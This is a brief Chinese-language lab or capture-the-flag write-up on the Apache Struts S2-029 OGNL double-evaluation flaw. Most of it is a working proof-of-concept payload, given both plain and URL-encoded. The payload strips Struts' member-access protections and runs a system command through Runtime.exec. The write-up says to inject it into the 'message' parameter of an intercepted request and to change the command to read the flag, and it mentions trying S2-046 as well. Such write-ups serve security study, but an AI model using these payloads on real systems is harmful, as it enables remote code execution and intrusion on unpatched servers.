s2-029:强制使用Apache Struts框架时,会对分配给某些标签的属性值进行双重评估,因此可以传递将在呈现标签属性时再次评估的值
打开源代码发现传递的参数为message;
poc:
(#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()))
编码后:
%28%23_memberAccess%5B%27allowPrivateAccess%27%5D%3Dtrue%2C%23_memberAccess%5B%27allowProtectedAccess%27%5D%3Dtrue%2C%23_memberAccess%5B%27excludedPackageNamePatterns%27%5D%3D%23_memberAccess%5B%27acceptProperties%27%5D%2C%23_memberAccess%5B%27excludedClasses%27%5D%3D%23_memberAccess%5B%27acceptProperties%27%5D%2C%23_memberAccess%5B%27allowPackageProtectedAccess%27%5D%3Dtrue%2C%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%29
抓包后修改添加参数+poc,在message参数的value属性中能够看到命令执行的结果;
修改命令可以得到key值;
也可以直接使用工具检测,修改数据提交方式为get,使用s2-046漏洞即可;